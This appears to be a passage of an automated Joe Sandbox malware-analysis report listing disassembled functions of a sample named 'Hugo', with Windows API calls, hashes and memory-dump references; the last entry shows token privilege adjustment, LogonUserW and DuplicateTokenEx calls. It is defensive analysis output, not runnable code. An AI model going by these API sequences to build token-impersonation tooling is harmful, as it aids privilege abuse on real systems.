Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: Name$Path$FileFullLongOpen
String ID: X
API String ID: 779396738-3081909835
Opcode ID: 507752eadf1fe4efb40c3b554b6e6c3c5d0157e32ae74365eba18d2dd74aa1c0
Instruction ID: bfab1334c7631d396e33e85d8ce940dae8ebfcea75fc19a8675bb5fd71ba877e
Opcode Fuzzy Hash: 507752eadf1fe4efb40c3b554b6e6c3c5d0157e32ae74365eba18d2dd74aa1c0
Instruction Fuzzy Hash: C421C371A002589BDB41DF94CC05BEE7BFDAF49314F04801AE545AB241DBB89A89AF61

Function 00F1396B Relevance: 3.1, APIs: 2, Instructions: 77windowCOMMON

Download Yara Rule

APIs

Shell_NotifyIconW.SHELL32(00000000,?), ref: 00F13A3C

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: IconNotifyShell_
String ID:
API String ID: 1144537725-0
Opcode ID: e137cb0971ea294f16be8f7b9c2411831235ef40718d7d11f5ad061fba2839a8
Instruction ID: 89dda97a1dd3b8b0707664a6b98bc763480ed146e8dc3767f456caaef266a596
Opcode Fuzzy Hash: e137cb0971ea294f16be8f7b9c2411831235ef40718d7d11f5ad061fba2839a8
Instruction Fuzzy Hash: 9F31B1715043048FE760DF24D8857D7BBE8FF49718F00092EEADA87240E775A988DB52

Function 00F1331B Relevance: 3.0, APIs: 2, Instructions: 30COMMON

Download Yara Rule

APIs

IsThemeActive.UXTHEME ref: 00F1333D

Part of subcall function 00F132E6: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00F132FB
Part of subcall function 00F132E6: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00F13312

Part of subcall function 00F1338B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,00F13368,?), ref: 00F133BB
Part of subcall function 00F1338B: IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,00F13368,?), ref: 00F133CE
Part of subcall function 00F1338B: GetFullPathNameW.KERNEL32(00007FFF,?,?,00FE2418,00FE2400,?,?,?,?,?,?,00F13368,?), ref: 00F1343A
Part of subcall function 00F1338B: SetCurrentDirectoryW.KERNEL32(?,00000001,00FE2418,?,?,?,?,?,?,?,00F13368,?), ref: 00F134BB

SystemParametersInfoW.USER32(00002001,00000000,00000002,?), ref: 00F13377

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme
String ID:
API String ID: 1550534281-0
Opcode ID: 879dbad5c9263e6ee50fed56c0774d10f570aecd9dff27b6fc3de37eebaf8e4b
Instruction ID: 4baee83bf8cdae33fbd7aa407a707b3a4b7108b47aa54fa751907274f9a21121
Opcode Fuzzy Hash: 879dbad5c9263e6ee50fed56c0774d10f570aecd9dff27b6fc3de37eebaf8e4b
Instruction Fuzzy Hash: 7FF054725543CC9FD7406F60ED4AB6437A8A701719F044915B5094E1E2EBBA8590BF44

Function 00F1CAB0 Relevance: 2.1, APIs: 1, Instructions: 587COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 00F1CEEE

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: Init_thread_footer
String ID:
API String ID: 1385522511-0
Opcode ID: f454abf2bf0aefc87ba9f738d36f2dabeb530679eed1b0c0e6cfbb970e84e09f
Instruction ID: 3751c8ee236dfff6d14a086993eb17399d836ac2318ee6e00f4f13380d69da9c
Opcode Fuzzy Hash: f454abf2bf0aefc87ba9f738d36f2dabeb530679eed1b0c0e6cfbb970e84e09f
Instruction Fuzzy Hash: 4432BD75E402499FDB20CF54C888BFAB7B5FF45320F288059E916AB251C735ED81EB91

Function 00F97AF9 Relevance: 1.8, APIs: 1, Instructions: 326COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: LoadString
String ID:
API String ID: 2948472770-0
Opcode ID: 6a016d0c5d67ed281644220c9a90bf2d5ce296872dbae9b4f62b539f4ad9003f
Instruction ID: 06f76088a2b8460ce7ccb2bb31957151d2101ace34bdafb40df234129f995373
Opcode Fuzzy Hash: 6a016d0c5d67ed281644220c9a90bf2d5ce296872dbae9b4f62b539f4ad9003f
Instruction Fuzzy Hash: A3D17C35E1420ADFDF14EF98C8819EDBBB5FF48320F14415AE915AB291DB34AD81DB90

Function 00F3F106 Relevance: 1.7, APIs: 1, Instructions: 151COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f4eba51ef852d60b164941a4ce7ba371d5b88e233b4a4d269020a8db57f9b608
Instruction ID: 412747f2d84535b784fa457fccd2fefa0e7fa848a1dd9185a440c34cc930cd23
Opcode Fuzzy Hash: f4eba51ef852d60b164941a4ce7ba371d5b88e233b4a4d269020a8db57f9b608
Instruction Fuzzy Hash: 0E51C435E00248EFDB10DF68CC41BAA7BA1EB85374F198168E8189B392D735ED46DB90

Function 00F7FCB5 Relevance: 1.6, APIs: 1, Instructions: 136COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?), ref: 00F7FCCE

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: BuffCharLower
String ID:
API String ID: 2358735015-0
Opcode ID: 37e04971e0754e2ea5142b8db994c5d5cdd1de16d62668a47d01bad1ddeceead
Instruction ID: d4e2210b8558a8e51295fceba27fe11b8908016892dde0069aa74978b1a067b8
Opcode Fuzzy Hash: 37e04971e0754e2ea5142b8db994c5d5cdd1de16d62668a47d01bad1ddeceead
Instruction Fuzzy Hash: B441B576900209AFCB21AF68CC819AEB7F9EF44324B10853FE516D7251EB70DA49AB51

Function 00F16679 Relevance: 1.6, APIs: 1, Instructions: 65libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00F1663E: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00F1668B,?,?,00F162FA,?,00000001,?,?,00000000), ref: 00F1664A
Part of subcall function 00F1663E: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00F1665C
Part of subcall function 00F1663E: FreeLibrary.KERNEL32(00000000,?,?,00F1668B,?,?,00F162FA,?,00000001,?,?,00000000), ref: 00F1666E

LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,00F162FA,?,00000001,?,?,00000000), ref: 00F166AB

Part of subcall function 00F16607: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00F55657,?,?,00F162FA,?,00000001,?,?,00000000), ref: 00F16610
Part of subcall function 00F16607: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00F16622
Part of subcall function 00F16607: FreeLibrary.KERNEL32(00000000,?,?,00F55657,?,?,00F162FA,?,00000001,?,?,00000000), ref: 00F16635

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: Library$Load$AddressFreeProc
String ID:
API String ID: 2632591731-0
Opcode ID: eba91f09095f75a8c0a21965d729af771e2b3a63d73781af043e98c8d1e27da0
Instruction ID: b7a9e4a6bc584c72880dfde594d1a63f287865bad04458bdbdd6a2491668fe9a
Opcode Fuzzy Hash: eba91f09095f75a8c0a21965d729af771e2b3a63d73781af043e98c8d1e27da0
Instruction Fuzzy Hash: 9811E372600205EACF14FB20CC12BED7BA59F50B21F10442DF542EA1C2EEB9DA85FB50

Function 00F48782 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

__wsopen_s.LIBCMT ref: 00F487C0

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: __wsopen_s
String ID:
API String ID: 3347428461-0
Opcode ID: 33c3c1ac1bc8fd3e06ee5a34ee29399ece430e70b92fa5c04902e362536726ac
Instruction ID: 2266340a3ea9184ec411fca64196685913108a8e4f41a7a1ca231c0766cc7e9f
Opcode Fuzzy Hash: 33c3c1ac1bc8fd3e06ee5a34ee29399ece430e70b92fa5c04902e362536726ac
Instruction Fuzzy Hash: 71115A7290410AAFCF05DF58E94099E7BF4FF48310F114069FC08AB311DA31EA12DB64

Function 00F3E972 Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eb1dcaca3f7520121673565f353bd58828d6484f0fca4c940b7c4def7923b9e8
Instruction ID: d90ce27aec36fe79e0e914a8fae15c14d02f491bcb4cef7e583bb9403bf742a8
Opcode Fuzzy Hash: eb1dcaca3f7520121673565f353bd58828d6484f0fca4c940b7c4def7923b9e8
Instruction Fuzzy Hash: B7F0CD3290262097D6713A7A9C0575B37988F42774F100725FD65971D2DB78D802B7E2

Function 00F1B329 Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00F1B333

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: _wcslen
String ID:
API String ID: 176396367-0
Opcode ID: 72016342fb2288f5c97d020dcdbcbf511746de536e6c34c5e74ca06ec4170ab8
Instruction ID: 50e95103c5b483c804c2b466af731aaf9678f79212be168b017f14db6352fa0f
Opcode Fuzzy Hash: 72016342fb2288f5c97d020dcdbcbf511746de536e6c34c5e74ca06ec4170ab8
Instruction Fuzzy Hash: F9F0C8B3601704AED714AF29DC06BA7BB98EB44770F10822AFA19CB1D1DB35E550DBA0

Function 00F43B93 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?,?,?,00F36A79,?,0000015D,?,?,?,?,00F385B0,000000FF,00000000,?,?), ref: 00F43BC5

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 9df3aef6635ffdaf2d67d6aa3876a43651f0e9aaccde40db24ab8ebb837fa091
Instruction ID: 4b479f8a742c1e840149408e7dfd2254b9e134cec670279dfbf540496d9848de
Opcode Fuzzy Hash: 9df3aef6635ffdaf2d67d6aa3876a43651f0e9aaccde40db24ab8ebb837fa091
Instruction Fuzzy Hash: 13E09232A40624A6EA2137769C02F5B3E5DEFC17B0F150161FC65D6A91DF74CE40B5E1

Function 00F166E7 Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 48464e4ce415238ed292dce73c2a3706c8322132d4d0411d1861686149d45429
Instruction ID: e40d551196f0b21032ed8de2c166639dbc648353fde32861bd3dc496dd6439a5
Opcode Fuzzy Hash: 48464e4ce415238ed292dce73c2a3706c8322132d4d0411d1861686149d45429
Instruction Fuzzy Hash: 88F039B1505752CFCB349F64D8A0896BBF4BF1532A324897EE6D7C6610CB329884EF50

Function 00F1684A Relevance: 1.5, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

__fread_nolock.LIBCMT ref: 00F16868

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: __fread_nolock
String ID:
API String ID: 2638373210-0
Opcode ID: dbc72fcbbe417d099125a5b7f0b477dbc50683e17be9c436dba593077d17b43b
Instruction ID: e0fac89f3eac0a71df2da90b4e2e2c5f7637df8075ed902b6f7a81fb6dd7b6dc
Opcode Fuzzy Hash: dbc72fcbbe417d099125a5b7f0b477dbc50683e17be9c436dba593077d17b43b
Instruction Fuzzy Hash: DAF0D47650020DFBDF05DF90C941E9E7B79FF18318F208445F9159A151C336EA61EBA1

Function 00F13907 Relevance: 1.5, APIs: 1, Instructions: 24windowCOMMON

Download Yara Rule

APIs

Shell_NotifyIconW.SHELL32(00000002,?), ref: 00F13963

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: IconNotifyShell_
String ID:
API String ID: 1144537725-0
Opcode ID: 272a5efc584e926ece98358935def2a2bb6375dcdf7d327af0bbe9ede5fdb6ff
Instruction ID: 1a2aba288f80899eba04ffb7b632195de38e442c522e2ca23e825034d2f224a7
Opcode Fuzzy Hash: 272a5efc584e926ece98358935def2a2bb6375dcdf7d327af0bbe9ede5fdb6ff
Instruction Fuzzy Hash: E7F0377091435C9FE792DF24DC467D57BBCA705708F0000A5A6849A181E7745788DF51

Function 00F13A57 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 00F13A76

Part of subcall function 00F18577: _wcslen.LIBCMT ref: 00F1858A

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: LongNamePath_wcslen
String ID:
API String ID: 541455249-0
Opcode ID: 70a49d452f5af73e46a7585d0ac07b48807f1823e5c621d78f3cdb4c243dd44b
Instruction ID: 381fd3172be517b1e8ea20d59864c26ca9a39d6003647dd694e3c91c73dbc68a
Opcode Fuzzy Hash: 70a49d452f5af73e46a7585d0ac07b48807f1823e5c621d78f3cdb4c243dd44b
Instruction Fuzzy Hash: AAE0C276A002285BCB20A2589C06FEA77EDDFC97A0F4441B1FD09D7258DD64EDC1E6A0

Function 00F5071A Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,00000000,?,00F50A84,?,?,00000000,?,00F50A84,00000000,0000000C), ref: 00F50737

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 7b589d7d080a85b71eecbe5c713829886ddf647926bfe1dc5e4bf41d54b135ec
Instruction ID: 03278655908ee100025c1e27250877b08d7f2797ea94b0908742e81418442231
Opcode Fuzzy Hash: 7b589d7d080a85b71eecbe5c713829886ddf647926bfe1dc5e4bf41d54b135ec
Instruction Fuzzy Hash: B5D06C3210010DBBDF028F84DD06EDA3BAAFB48714F014000BE5856020C736E821AB90

Function 00F7EAB0 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(?,00F7D840), ref: 00F7EAB1

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: e15b5e079b8814c74b62acf7544999653e0d843e9c238b6896f1633175328d60
Instruction ID: 14cbc6e162f6c5bfd0de6f04d1518d999f9d56348d4b30c36a2d982d66445d5c
Opcode Fuzzy Hash: e15b5e079b8814c74b62acf7544999653e0d843e9c238b6896f1633175328d60
Instruction Fuzzy Hash: 45B09264C4060005BD280A385A09A99334078473B57DC5BC2E47E854F1C33D8C0FF952

Function 00F8664C Relevance: 1.3, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 00F7DC54: FindFirstFileW.KERNEL32(?,?), ref: 00F7DCCB
Part of subcall function 00F7DC54: DeleteFileW.KERNEL32(?,?,?,?), ref: 00F7DD1B
Part of subcall function 00F7DC54: FindNextFileW.KERNELBASE(00000000,00000010), ref: 00F7DD2C
Part of subcall function 00F7DC54: FindClose.KERNEL32(00000000), ref: 00F7DD43

GetLastError.KERNEL32 ref: 00F8666E

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: FileFind$CloseDeleteErrorFirstLastNext
String ID:
API String ID: 2191629493-0
Opcode ID: 7527e27f35d0bf606545c0d31efe596684121fde5d2798ecd116cec1c2bd91b8
Instruction ID: 0c5eab70ec228ab308ba931c93aedbb119bc7cd9dca2c69e7e9c9c75748818c8
Opcode Fuzzy Hash: 7527e27f35d0bf606545c0d31efe596684121fde5d2798ecd116cec1c2bd91b8
Instruction Fuzzy Hash: FCF0A7357002044FCB10FF58D845BAEB7E5AF84360F048409F90A8B352CB74BC41DB91

Non-executed Functions

Function 00F71B4D Relevance: 38.7, APIs: 19, Strings: 3, Instructions: 241COMMON

Download Yara Rule

APIs

Part of subcall function 00F72010: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00F7205A
Part of subcall function 00F72010: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00F72087
Part of subcall function 00F72010: GetLastError.KERNEL32 ref: 00F72097

LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 00F71BD2
DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 00F71BF4
CloseHandle.KERNEL32(?), ref: 00F71C05
OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00F71C1D
GetProcessWindowStation.USER32 ref: 00F71C36
SetProcessWindowStation.USER32(00000000), ref: 00F71C40
OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00F71C5C

